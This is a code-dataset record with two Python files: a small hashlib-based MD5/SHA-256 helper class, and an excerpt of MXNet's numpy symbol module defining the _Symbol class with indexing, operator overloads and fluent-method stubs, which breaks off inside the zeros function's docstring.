repo_name
stringlengths
5
100
ref
stringlengths
12
67
path
stringlengths
4
244
copies
stringlengths
1
8
content
stringlengths
0
1.05M
authurlan/amdfin
refs/heads/develop
server/module/hasher.py
1
# -*- coding: utf-8 -*-
import hashlib


class Hasher():
    """Thin convenience wrapper around common message digests.

    Uses the standard-library ``hashlib`` module instead of the former
    third-party PyCrypto (``Crypto.Hash``) dependency; the hexadecimal
    digest output is byte-identical, so callers are unaffected.

    NOTE: MD5 is cryptographically broken — keep it only for
    non-security purposes such as checksums or cache keys.
    """

    def __init__(self):
        pass

    def md5(self, message):
        """Return the hexadecimal MD5 digest of *message* (bytes-like)."""
        return hashlib.md5(message).hexdigest()

    def sha256(self, message):
        """Return the hexadecimal SHA-256 digest of *message* (bytes-like)."""
        return hashlib.sha256(message).hexdigest()

# vim: set ts=4 sw=4 sts=4 et:
DickJC123/mxnet
refs/heads/master
python/mxnet/symbol/numpy/_symbol.py
3
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=too-many-lines, unused-argument """numpy namespace for operators used in Gluon APIs dispatched by F=symbol module.""" import ctypes import numpy as _np from . import _op as _mx_np_op from ...base import _LIB, SymbolHandle, numeric_types, mx_uint, integer_types, string_types from ...base import c_str from ...base import py_str from ...util import check_call, set_module, _sanity_check_params from ...util import wrap_np_unary_func, wrap_np_binary_func from ...util import is_np_default_dtype from ...context import current_context from ..symbol import Symbol, Group from .._internal import _set_np_symbol_class from . 
import _internal as _npi try: from __builtin__ import slice as py_slice except ImportError: from builtins import slice as py_slice __all__ = ['zeros', 'zeros_like', 'ones', 'ones_like', 'full', 'full_like', 'empty_like', 'bitwise_not', 'invert', 'delete', 'add', 'broadcast_to', 'subtract', 'multiply', 'divide', 'mod', 'remainder', 'fmod', 'power', 'arctan2', 'trace', 'transpose', 'copy', 'moveaxis', 'reshape', 'dot', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt', 'abs', 'absolute', 'fabs', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log', 'degrees', 'log2', 'log1p', 'matmul', 'median', 'rint', 'radians', 'reciprocal', 'square', 'negative', 'fix', 'ceil', 'floor', 'histogram', 'insert', 'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh', 'argsort', 'sort', 'tensordot', 'eye', 'linspace', 'logspace', 'expand_dims', 'tile', 'arange', 'array_split', 'split', 'hsplit', 'vsplit', 'dsplit', 'concatenate', 'append', 'stack', 'vstack', 'row_stack', 'column_stack', 'hstack', 'dstack', 'average', 'mean', 'maximum', 'fmax', 'minimum', 'fmin', 'any', 'all', 'around', 'round', 'round_', 'flatnonzero', 'tril_indices', 'amax', 'amin', 'max', 'min', 'logical_and', 'logical_or', 'logical_xor', 'swapaxes', 'clip', 'argmax', 'argmin', 'std', 'var', 'indices', 'copysign', 'ravel', 'unravel_index', 'diag_indices_from', 'hanning', 'hamming', 'blackman', 'flip', 'flipud', 'fliplr', 'hypot', 'bitwise_and', 'bitwise_xor', 'bitwise_or', 'rad2deg', 'deg2rad', 'unique', 'lcm', 'gcd', 'interp', 'tril', 'triu', 'tri', 'identity', 'take', 'ldexp', 'vdot', 'inner', 'outer', 'cross', 'kron', 'equal', 'not_equal', 'greater', 'less', 'greater_equal', 'less_equal', 'roll', 'rot90', 'einsum', 'true_divide', 'quantile', 'percentile', 'shares_memory', 'may_share_memory', 'diff', 'ediff1d', 'resize', 'polyval', 'nan_to_num', 'isnan', 'isinf', 'isposinf', 'isneginf', 'isfinite', 'atleast_1d', 'atleast_2d', 'atleast_3d', 'squeeze', 'where', 'bincount', 'rollaxis', 
'diagflat', 'repeat', 'prod', 'pad', 'cumsum', 'sum', 'diag', 'diagonal'] @set_module('mxnet.symbol.numpy') class _Symbol(Symbol): def __getitem__(self, key): # pylint: disable = too-many-return-statements, inconsistent-return-statements """Return self[key]. If the symbol is a symbol list, it returns the i-th symbol or a list of symbols selected by key. Otherwise, it outputs a symbol that slice the input by the given key. Currently, this function supports the following types of key: - integer types, e.g., int, long, np.int32, np.int64 - slice containing integer constants, e.g., slice(0, None, None) - tuple contaning the above elements, which is used for multidimensional indexing Parameters ---------- key : int, slice, or tuple of all previous types Indexing key. """ num_outputs = self.num_outputs if num_outputs > 1: num_outputs = self.num_outputs if isinstance(key, integer_types): key = int(key) if key < -num_outputs or key >= num_outputs: raise IndexError('list index out of range') if key < 0: key += num_outputs ret_handle = SymbolHandle() check_call(_LIB.MXSymbolGetOutput(self.handle, mx_uint(key), ctypes.byref(ret_handle))) return _Symbol(handle=ret_handle) elif isinstance(key, py_slice): start, stop, step = key.indices(num_outputs) return Group([self[i] for i in range(start, stop, step)], _Symbol) else: raise TypeError('indices of symbol group must be integers or slices, not {}' .format(type(key))) else: all = __builtins__['all'] # pylint: disable=redefined-outer-name if isinstance(key, integer_types): if key == -1: sliced = _npi.slice(self, [key], [None]) else: sliced = _npi.slice(self, [key], [key+1]) return _npi.reshape(sliced, (-3, -4)) elif isinstance(key, py_slice): if key.step is None or key.step != 0: start = [None] if key.start is None else key.start stop = [None] if key.stop is None else key.stop return _npi.slice(self, start, stop, key.step) else: raise ValueError("slice step cannot be zero") elif isinstance(key, Symbol): return 
_npi.advanced_indexing(self, key) elif isinstance(key, tuple) and len(key) == 0: return self elif isinstance(key, tuple) and all(isinstance(k, Symbol) for k in key): key = _npi.stack(*[i for i in key]) sliced = _npi.advanced_indexing_multiple(self, key) return sliced elif isinstance(key, tuple): begin = [] end = [] step = [] new_shape = () assert len(key) # len(key) == 0 handled above for index in key: if isinstance(index, py_slice): if index.step is not None and index.step == 0: raise ValueError("slice step cannot be zero") begin.append(index.start) end.append(index.stop) step.append(index.step) new_shape += (-2,) elif isinstance(index, integer_types): if index >= 0: begin.append(index) end.append(index+1) step.append(1) else: begin.append(index) end.append(index - 1) step.append(-1) new_shape += (-3,) else: raise IndexError('Only integer, slice, symbol or tuple of these types' ' are supported! Received key={}'.format(key)) new_shape += (-4,) sliced = _npi.slice(self, begin, end, step) return _npi.reshape(sliced, new_shape) else: raise IndexError('Only integer, slice, tuple or Symbol of these types are supported! ' 'Received key={}'.format(key)) def __setitem__(self, key, value): raise NotImplementedError def __repr__(self): """Gets a string representation of the symbol.""" if self._alive: if self.num_outputs > 1: name = ', '.join([str(ele_sym) for ele_sym in self]) return '<%s group [%s]>' % (self.__class__.__name__, name) else: return '<%s %s>' % (self.__class__.__name__, self.name) else: return '<FREED {}>'.format(self.__class__.__name__) @property def name(self): """Gets name string from the symbol, this function only works for symbols that are not a list (grouped symbols). Returns ------- value : str The name of this symbol, returns ``None`` for list symbol. """ if self.num_outputs > 1: raise AttributeError('This is a Group Symbol that contains {} elements and' ' does not have a name. 
Use str(sym) to print the name of ' 'all the elements instead.'.format(self.num_outputs)) ret = ctypes.c_char_p() success = ctypes.c_int() check_call(_LIB.MXSymbolGetName( self.handle, ctypes.byref(ret), ctypes.byref(success))) assert success.value != 0,\ 'Fail to infer the name of a symbol that is not a list!' return py_str(ret.value) def __iter__(self): if self.num_outputs == 1: raise TypeError("'{}' is not iterable.".format(self)) return iter((self[i] for i in range(self.num_outputs))) def __add__(self, other): """x.__add__(y) <=> x + y""" return add(self, other) def __invert__(self): """x.__invert__() <=> ~x""" return invert(self) def __and__(self, other): """x.__and__(y) <=> x & y""" return bitwise_and(self, other) def __or__(self, other): """x.__or__(y) <=> x | y""" return bitwise_or(self, other) def __xor__(self, other): """x.__xor__(y) <=> x ^ y""" return bitwise_xor(self, other) def __round__(self, n=0): """x.__round__(n)""" return round(self, decimals=n) def __abs__(self): """x.__abs__()""" return absolute(self) def __ceil__(self): """x.__ceil__()""" return ceil(self) def __floor__(self): """x.__floor__()""" return floor(self) def __trunc__(self): """x.__trunc__()""" return trunc(self) def __sub__(self, other): """x.__sub__(y) <=> x - y""" return subtract(self, other) def __rsub__(self, other): """x.__rsub__(y) <=> y - x""" return subtract(other, self) def __mul__(self, other): """x.__mul__(y) <=> x * y""" return multiply(self, other) def __rmul__(self, other): """x.__rmul__(y) <=> y * x""" return multiply(other, self) def __div__(self, other): """x.__truediv__(y) <=> x / y""" return divide(self, other) def __rdiv__(self, other): """x.__rdiv__(y) <=> y / x""" return divide(other, self) def __mod__(self, other): """x.__mod__(y) <=> x % y""" return mod(self, other) def __rmod__(self, other): """x.__rmod__(y) <=> y % x""" return mod(other, self) def __idiv__(self, other): raise NotImplementedError def __truediv__(self, other): """x.__truediv__(y) <=> x / 
y""" return divide(self, other) def __rtruediv__(self, other): """x.__rtruediv__(y) <=> y / x""" return divide(other, self) def __itruediv__(self, other): raise NotImplementedError def __pow__(self, other): """x.__pow__(y) <=> x ** y""" return power(self, other) def __rpow__(self, other): return power(other, self) def __neg__(self): """x.__neg__() <=> - x""" return negative(self) def __deepcopy__(self, _): return super().__deepcopy__(_).as_np_ndarray() def __eq__(self, other): """x.__eq__(y) <=> x == y""" return equal(self, other) def __ne__(self, other): """x.__ne__(y) <=> x != y""" return not_equal(self, other) def __gt__(self, other): """x.__gt__(y) <=> x > y""" return greater(self, other) def __ge__(self, other): """x.__ge__(y) <=> x >= y""" return greater_equal(self, other) def __lt__(self, other): """x.__lt__(y) <=> x < y""" return less(self, other) def __le__(self, other): """x.__le__(y) <=> x <= y""" return less_equal(self, other) def __len__(self): if self.num_outputs == 1: raise TypeError('{} is not a list and does not support len().'.format(self)) return self.num_outputs @property def num_outputs(self): """The number of outputs of a symbol. If the symbol is not a symbollist, it returns 1. 
Otherwise, it returns the number of elements of the list.""" output_count = mx_uint() check_call(_LIB.MXSymbolGetNumOutputs(self.handle, ctypes.byref(output_count))) return output_count.value def as_nd_ndarray(self): """Convert _Symbol to mxnet.symbol.Symbol to use its convenience fluent methods.""" hdl = SymbolHandle() check_call(_LIB.MXShallowCopySymbol(self.handle, ctypes.byref(hdl))) return Symbol(handle=hdl) def as_np_ndarray(self): """For the convenience of conversion between legacy and np symbols.""" return self @property # pylint: disable= invalid-name, undefined-variable def T(self): """Same as self.transpose().""" return self.transpose() # pylint: enable= invalid-name, undefined-variable def astype(self, dtype, order='K', casting='unsafe', subok=True, copy=True): # pylint: disable=arguments-differ,unused-argument,too-many-arguments,redefined-outer-name """ Copy of the array, cast to a specified type. Parameters ---------- dtype : str or dtype Typecode or data-type to which the array is cast. order : {'C', 'F', 'A', 'K'}, optional Controls the memory layout order of the result. 'C' means C order, 'F' means Fortran order, 'A' means 'F' order if all the arrays are Fortran contiguous, 'C' order otherwise, and 'K' means as close to the order the array elements appear in memory as possible. Default is 'K'. casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional Controls what kind of data casting may occur. Defaults to 'unsafe' for backwards compatibility. * 'no' means the data types should not be cast at all. * 'equiv' means only byte-order changes are allowed. * 'safe' means only casts which can preserve values are allowed. * 'same_kind' means only safe casts or casts within a kind, like float64 to float32, are allowed. * 'unsafe' means any data conversions may be done. subok : bool, optional If True, then sub-classes will be passed-through (default), otherwise the returned array will be forced to be a base-class array. 
copy : bool, optional Default `True`. By default, astype always returns a newly allocated ndarray on the same context. If this is set to `False`, and the dtype requested is the same as the ndarray's dtype, the ndarray is returned instead of a copy. Returns ------- arr_t : ndarray Unless `copy` is False and the other conditions for returning the input array are satisfied (see description for `copy` input parameter), `arr_t` is a new array of the same shape as the input array with `dtype`. Notes ----- This function differs from the official `ndarray`'s ``astype`` function in the following aspects: - `order` only supports 'C' and 'K'. - `casting` only supports 'unsafe'. - `subok` only supports ``True``. """ if order is not None and order != 'K' and order != 'C': raise ValueError('order must be either \'K\' or \'C\'') if casting != 'unsafe': raise ValueError('casting must be equal to \'unsafe\'') if not subok: raise ValueError('subok must be equal to True') return _npi.cast(self, dtype=dtype) def dot(self, b, out=None): """Dot product of two arrays. Refer to ``numpy.dot`` for full documentation.""" return _npi.dot(self, b, out=out) def reshape(self, *args, **kwargs): # pylint: disable=arguments-differ """Returns a copy of the array with a new shape. Notes ----- Unlike the free function `mxnet.numpy.reshape`, this method on `ndarray` allows the elements of the shape parameter to be passed in as separate arguments. For example, ``a.reshape(10, 11)`` is equivalent to ``a.reshape((10, 11))``. 
""" order = 'C' if len(kwargs) > 1: raise TypeError('function takes at most 1 keyword argument') if len(kwargs) == 1: if 'order' not in kwargs: raise TypeError('{} is an invalid keyword argument for this function' .format(kwargs.keys()[0])) order = kwargs.pop('order', 'C') if order != 'C': raise NotImplementedError('only supports C-order,' ' while received {}'.format(order)) if len(args) == 0: raise TypeError('reshape() takes exactly 1 argument (0 given)') if len(args) == 1 and isinstance(args[0], tuple): return _mx_np_op.reshape(self, newshape=args[0], order=order) else: return _mx_np_op.reshape(self, newshape=args, order=order) def argmax(self, axis=None, out=None): # pylint: disable=arguments-differ """Return indices of the maximum values along the given axis. Refer to `mxnet.numpy.argmax` for full documentation.""" return argmax(self, axis, out) def reshape_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`reshape_like`. The arguments are the same as for :py:func:`reshape_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute reshape_like') def zeros_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`zeros_like`. The arguments are the same as for :py:func:`zeros_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute zeros_like') def ones_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`ones_like`. The arguments are the same as for :py:func:`ones_like`, with this array as data. """ raise AttributeError('_Symbol object has no attribute ones_like') def broadcast_axes(self, *args, **kwargs): """Convenience fluent method for :py:func:`broadcast_axes`. The arguments are the same as for :py:func:`broadcast_axes`, with this array as data. 
""" raise AttributeError('_Symbol object has no attribute broadcast_like') def repeat(self, repeats, axis=None): # pylint: disable=arguments-differ """Repeat elements of an array.""" return repeat(self, repeats=repeats, axis=axis) def pad(self, *args, **kwargs): """Convenience fluent method for :py:func:`pad`. The arguments are the same as for :py:func:`pad`, with this array as data. """ raise AttributeError('_Symbol object has no attribute pad') def swapaxes(self, axis1, axis2): # pylint: disable=arguments-differ """Return a copy of the array with axis1 and axis2 interchanged. Refer to `mxnet.numpy.swapaxes` for full documentation. """ return swapaxes(self, axis1, axis2) def split(self, *args, **kwargs): """Convenience fluent method for :py:func:`split`. The arguments are the same as for :py:func:`split`, with this array as data. """ raise AttributeError('_Symbol object has no attribute split') def split_v2(self, *args, **kwargs): """Convenience fluent method for :py:func:`split_v2`. The arguments are the same as for :py:func:`split_v2`, with this array as data. """ raise AttributeError('_Symbol object has no attribute split_v2') def slice(self, *args, **kwargs): """Convenience fluent method for :py:func:`slice`. The arguments are the same as for :py:func:`slice`, with this array as data. """ raise AttributeError('_Symbol object has no attribute slice') def slice_axis(self, *args, **kwargs): """Convenience fluent method for :py:func:`slice_axis`. The arguments are the same as for :py:func:`slice_axis`, with this array as data. """ raise AttributeError('_Symbol object has no attribute slice_axis') def slice_like(self, *args, **kwargs): """Convenience fluent method for :py:func:`slice_like`. The arguments are the same as for :py:func:`slice_like`, with this array as data. 
""" raise AttributeError('_Symbol object has no attribute slice_like') def take(self, indices, axis=None, mode='raise'): # pylint: disable=arguments-differ, redefined-outer-name """Convenience fluent method for :py:func:`take`. The arguments are the same as for :py:func:`take`, with this array as data. """ return take(self, indices, axis, mode=mode) def one_hot(self, *args, **kwargs): """Convenience fluent method for :py:func:`one_hot`. The arguments are the same as for :py:func:`one_hot`, with this array as data. """ raise AttributeError('_Symbol object has no attribute one_hot') def pick(self, *args, **kwargs): """Convenience fluent method for :py:func:`pick`. The arguments are the same as for :py:func:`pick`, with this array as data. """ raise AttributeError('_Symbol object has no attribute pick') def sort(self, axis=-1, kind=None, order=None): # pylint: disable=arguments-differ """Convenience fluent method for :py:func:`sort`. The arguments are the same as for :py:func:`sort`, with this array as data. """ raise sort(self, axis=axis, kind=kind, order=order) def topk(self, *args, **kwargs): """Convenience fluent method for :py:func:`topk`. The arguments are the same as for :py:func:`topk`, with this array as data. """ raise AttributeError('_Symbol object has no attribute topk') def argsort(self, axis=-1, kind=None, order=None): # pylint: disable=arguments-differ """Convenience fluent method for :py:func:`argsort`. The arguments are the same as for :py:func:`argsort`, with this array as data. """ return argsort(self, axis=axis, kind=kind, order=order) def argmax_channel(self, *args, **kwargs): """Convenience fluent method for :py:func:`argmax_channel`. The arguments are the same as for :py:func:`argmax_channel`, with this array as data. """ raise AttributeError('_Symbol object has no attribute argmax_channel') def argmin(self, axis=None, out=None): # pylint: disable=arguments-differ """Return indices of the minimum values along the given axis. 
Refer to `mxnet.numpy.argmax` for full documentation.""" return argmin(self, axis, out) def clip(self, min=None, max=None, out=None): # pylint: disable=arguments-differ, redefined-outer-name """Return an array whose values are limited to [min, max]. One of max or min must be given. """ return clip(self, min, max, out=out) def abs(self, *args, **kwargs): """Convenience fluent method for :py:func:`abs`. The arguments are the same as for :py:func:`abs`, with this array as data. """ raise AttributeError('_Symbol object has no attribute abs') def sign(self, *args, **kwargs): """Convenience fluent method for :py:func:`sign`. The arguments are the same as for :py:func:`sign`, with this array as data. """ raise AttributeError('_Symbol object has no attribute abs') def flatten(self, order='C'): # pylint: disable=arguments-differ """Return a copy of the array collapsed into one dimension.""" return self.reshape(-1, order=order) def shape_array(self, *args, **kwargs): """Convenience fluent method for :py:func:`shape_array`. The arguments are the same as for :py:func:`shape_array`, with this array as data. """ raise AttributeError('_Symbol object has no attribute shape_array') def size_array(self, *args, **kwargs): """Convenience fluent method for :py:func:`size_array`. The arguments are the same as for :py:func:`size_array`, with this array as data. """ raise AttributeError('_Symbol object has no attribute size_array') def expand_dims(self, *args, **kwargs): # pylint: disable=arguments-differ,unused-argument """Convenience fluent method for :py:func:`expand_dims`. The arguments are the same as for :py:func:`expand_dims`, with this array as data. """ raise AttributeError('_Symbol object has no attribute expand_dims') def tile(self, *args, **kwargs): """Convenience fluent method for :py:func:`tile`. The arguments are the same as for :py:func:`tile`, with this array as data. 
""" raise AttributeError('_Symbol object has no attribute tile') def transpose(self, *axes): # pylint: disable=arguments-differ """The arguments are the same as for :py:func:`transpose`, with this array as data. """ if len(axes) == 0: axes = None elif len(axes) == 1: if isinstance(axes[0], (tuple, list)): axes = axes[0] elif axes[0] is None: axes = None return transpose(self, axes=axes) def flip(self, *args, **kwargs): """Convenience fluent method for :py:func:`flip`. The arguments are the same as for :py:func:`flip`, with this array as data. """ raise AttributeError('_Symbol object has no attribute flip') def depth_to_space(self, *args, **kwargs): """Convenience fluent method for :py:func:`depth_to_space`. The arguments are the same as for :py:func:`depth_to_space`, with this array as data. """ raise AttributeError('_Symbol object has no attribute depth_to_space') def space_to_depth(self, *args, **kwargs): """Convenience fluent method for :py:func:`space_to_depth`. The arguments are the same as for :py:func:`space_to_depth`, with this array as data. """ raise AttributeError('_Symbol object has no attribute space_to_depth') def diag(self, k=0, **kwargs): """Convenience fluent method for :py:func:`diag`. The arguments are the same as for :py:func:`diag`, with this array as data. """ raise AttributeError('_Symbol object has no attribute diag') def diagonal(self, offset=0, axis1=0, axis2=1): # pylint: disable=arguments-differ """Return the diagonal with the given offset. If array has more than two dimensions, then the axes specified by axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is returned. Refer to `mxnet.symbol.numpy.diagonal` for full documents. 
""" return diagonal(self, offset=offset, axis1=axis1, axis2=axis2) def sum(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the sum of the array elements over the given axis.""" return _npi.sum(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def nansum(self, *args, **kwargs): """Convenience fluent method for :py:func:`nansum`. The arguments are the same as for :py:func:`nansum`, with this array as data. """ raise AttributeError('_Symbol object has no attribute nansum') def prod(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the product of the array elements over the given axis.""" return _mx_np_op.prod(self, axis=axis, dtype=dtype, keepdims=keepdims, out=out) def nanprod(self, *args, **kwargs): """Convenience fluent method for :py:func:`nanprod`. The arguments are the same as for :py:func:`nanprod`, with this array as data. """ raise AttributeError('_Symbol object has no attribute nanprod') def mean(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Returns the average of the array elements along given axis.""" return mean(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def std(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ,too-many-arguments """Returns the standard deviation of the array elements along given axis.""" return std(self, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out) def var(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ,too-many-arguments """Returns the variance of the array elements, along given axis.""" return var(self, axis=axis, dtype=dtype, out=out, ddof=ddof, keepdims=keepdims) def cumsum(self, axis=None, dtype=None, out=None): """Return the cumulative sum of the elements along the given axis.""" return _npi.cumsum(self, axis=axis, dtype=dtype, out=out) def 
max(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the maximum along a given axis.""" return _npi.max(self, axis=axis, keepdims=keepdims, out=out) def min(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ """Return the minimum along a given axis.""" return _npi.min(self, axis=axis, keepdims=keepdims, out=out) def norm(self, *args, **kwargs): """Convenience fluent method for :py:func:`norm`. The arguments are the same as for :py:func:`norm`, with this array as data. """ raise AttributeError('_Symbol object has no attribute norm') def round(self, decimals=0, out=None, **kwargs): # pylint: disable=arguments-differ """Convenience fluent method for :py:func:`round`. The arguments are the same as for :py:func:`round`, with this array as data. """ return round(self, decimals=decimals, out=out, **kwargs) def rint(self, *args, **kwargs): """Convenience fluent method for :py:func:`rint`. The arguments are the same as for :py:func:`rint`, with this array as data. """ raise AttributeError('_Symbol object has no attribute rint') def fix(self, *args, **kwargs): """Convenience fluent method for :py:func:`fix`. The arguments are the same as for :py:func:`fix`, with this array as data. """ raise AttributeError('_Symbol object has no attribute fix') def floor(self, *args, **kwargs): """Convenience fluent method for :py:func:`floor`. The arguments are the same as for :py:func:`floor`, with this array as data. """ raise AttributeError('_Symbol object has no attribute floor') def ceil(self, *args, **kwargs): """Convenience fluent method for :py:func:`ceil`. The arguments are the same as for :py:func:`ceil`, with this array as data. """ raise AttributeError('_Symbol object has no attribute ceil') def trunc(self, *args, **kwargs): """Convenience fluent method for :py:func:`trunc`. The arguments are the same as for :py:func:`trunc`, with this array as data. 
""" raise AttributeError('_Symbol object has no attribute trunc') def sin(self, *args, **kwargs): """Convenience fluent method for :py:func:`sin`. The arguments are the same as for :py:func:`sin`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sin') def cos(self, *args, **kwargs): """Convenience fluent method for :py:func:`cos`. The arguments are the same as for :py:func:`cos`, with this array as data. """ raise AttributeError('_Symbol object has no attribute cos') def tan(self, *args, **kwargs): """Convenience fluent method for :py:func:`tan`. The arguments are the same as for :py:func:`tan`, with this array as data. """ raise AttributeError('_Symbol object has no attribute tan') def arcsin(self, *args, **kwargs): """Convenience fluent method for :py:func:`arcsin`. The arguments are the same as for :py:func:`arcsin`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arcsin') def arccos(self, *args, **kwargs): """Convenience fluent method for :py:func:`arccos`. The arguments are the same as for :py:func:`arccos`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arccos') def arctan(self, *args, **kwargs): """Convenience fluent method for :py:func:`arctan`. The arguments are the same as for :py:func:`arctan`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arctan') def degrees(self, *args, **kwargs): """Convenience fluent method for :py:func:`degrees`. The arguments are the same as for :py:func:`degrees`, with this array as data. """ raise AttributeError('_Symbol object has no attribute degrees') def radians(self, *args, **kwargs): """Convenience fluent method for :py:func:`radians`. The arguments are the same as for :py:func:`radians`, with this array as data. """ raise AttributeError('_Symbol object has no attribute radians') def sinh(self, *args, **kwargs): """Convenience fluent method for :py:func:`sinh`. 
The arguments are the same as for :py:func:`sinh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sinh') def cosh(self, *args, **kwargs): """Convenience fluent method for :py:func:`cosh`. The arguments are the same as for :py:func:`cosh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute cosh') def tanh(self, *args, **kwargs): """Convenience fluent method for :py:func:`tanh`. The arguments are the same as for :py:func:`tanh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute tanh') def arcsinh(self, *args, **kwargs): """Convenience fluent method for :py:func:`arcsinh`. The arguments are the same as for :py:func:`arcsinh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arcsinh') def arccosh(self, *args, **kwargs): """Convenience fluent method for :py:func:`arccosh`. The arguments are the same as for :py:func:`arccosh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arccosh') def arctanh(self, *args, **kwargs): """Convenience fluent method for :py:func:`arctanh`. The arguments are the same as for :py:func:`arctanh`, with this array as data. """ raise AttributeError('_Symbol object has no attribute arctanh') def exp(self, *args, **kwargs): """Convenience fluent method for :py:func:`exp`. The arguments are the same as for :py:func:`exp`, with this array as data. """ raise AttributeError('_Symbol object has no attribute exp') def expm1(self, *args, **kwargs): """Convenience fluent method for :py:func:`expm1`. The arguments are the same as for :py:func:`expm1`, with this array as data. """ raise AttributeError('_Symbol object has no attribute expm1') def log(self, *args, **kwargs): """Convenience fluent method for :py:func:`log`. The arguments are the same as for :py:func:`log`, with this array as data. 
""" raise AttributeError('_Symbol object has no attribute log') def log10(self, *args, **kwargs): """Convenience fluent method for :py:func:`log10`. The arguments are the same as for :py:func:`log10`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log10') def log2(self, *args, **kwargs): """Convenience fluent method for :py:func:`log2`. The arguments are the same as for :py:func:`log2`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log2') def log1p(self, *args, **kwargs): """Convenience fluent method for :py:func:`log1p`. The arguments are the same as for :py:func:`log1p`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log1p') def sqrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`sqrt`. The arguments are the same as for :py:func:`sqrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sqrt') def rsqrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`rsqrt`. The arguments are the same as for :py:func:`rsqrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute rsqrt') def cbrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`cbrt`. The arguments are the same as for :py:func:`cbrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute cqrt') def rcbrt(self, *args, **kwargs): """Convenience fluent method for :py:func:`rcbrt`. The arguments are the same as for :py:func:`rcbrt`, with this array as data. """ raise AttributeError('_Symbol object has no attribute rcqrt') def square(self, *args, **kwargs): """Convenience fluent method for :py:func:`square`. The arguments are the same as for :py:func:`square`, with this array as data. """ raise AttributeError('_Symbol object has no attribute square') def reciprocal(self, *args, **kwargs): """Convenience fluent method for :py:func:`reciprocal`. 
The arguments are the same as for :py:func:`reciprocal`, with this array as data. """ raise AttributeError('_Symbol object has no attribute reciprocal') def relu(self, *args, **kwargs): """Convenience fluent method for :py:func:`relu`. The arguments are the same as for :py:func:`relu`, with this array as data. """ raise AttributeError('_Symbol object has no attribute relu') def sigmoid(self, *args, **kwargs): """Convenience fluent method for :py:func:`sigmoid`. The arguments are the same as for :py:func:`sigmoid`, with this array as data. """ raise AttributeError('_Symbol object has no attribute sigmoid') def softmax(self, *args, **kwargs): """Convenience fluent method for :py:func:`softmax`. The arguments are the same as for :py:func:`softmax`, with this array as data. """ raise AttributeError('_Symbol object has no attribute softmax') def log_softmax(self, *args, **kwargs): """Convenience fluent method for :py:func:`log_softmax`. The arguments are the same as for :py:func:`log_softmax`, with this array as data. """ raise AttributeError('_Symbol object has no attribute log_softmax') def softmin(self, *args, **kwargs): """Convenience fluent method for :py:func:`softmin`. The arguments are the same as for :py:func:`softmin`, with this array as data. 
        """
        raise AttributeError('_Symbol object has no attribute softmin')

    def squeeze(self, axis=None):  # pylint: disable=arguments-differ
        """Remove single-dimensional entries from the shape of a."""
        return squeeze(self, axis=axis)

    def broadcast_to(self, *args, **kwargs):
        raise AttributeError('_Symbol object has no attribute broadcast_to')

    def broadcast_like(self, *args, **kwargs):
        raise AttributeError('_Symbol object has no attribute broadcast_like')

    # pylint: disable=too-many-arguments
    def optimize_for(self, backend, args=None, aux=None, ctx=None,
                     shape_dict=None, type_dict=None, stype_dict=None,
                     skip_infer=False, **kwargs):
        """Partitions current symbol and optimizes it for a given backend.

        Delegates to the base ``Symbol.optimize_for`` and re-wraps the
        partitioned result as a numpy-compatible symbol so callers keep
        working with ``_Symbol`` semantics.
        """
        new_sym = super().optimize_for(backend, args, aux, ctx, shape_dict, type_dict,
                                       stype_dict, skip_infer, **kwargs)
        # The base class returns a classic Symbol; convert back to np flavor.
        new_sym = new_sym.as_np_ndarray()
        return new_sym


@set_module('mxnet.symbol.numpy')
def zeros(shape, dtype=float, order='C', ctx=None):
    """Return a new array of given shape and type, filled with zeros.
    This function currently only supports storing multi-dimensional data
    in row-major (C-style).

    Parameters
    ----------
    shape : int or tuple of int
        The shape of the empty array.
    dtype : str or numpy.dtype, optional
        An optional value type.
        When npx.is_np_default_dtype() returns False, default dtype is float32;
        When npx.is_np_default_dtype() returns True, default dtype is float64.
        Note that this behavior is different from NumPy's `zeros` function where
        `float64` is the default value, here we can set 'float32' or 'float64' as your
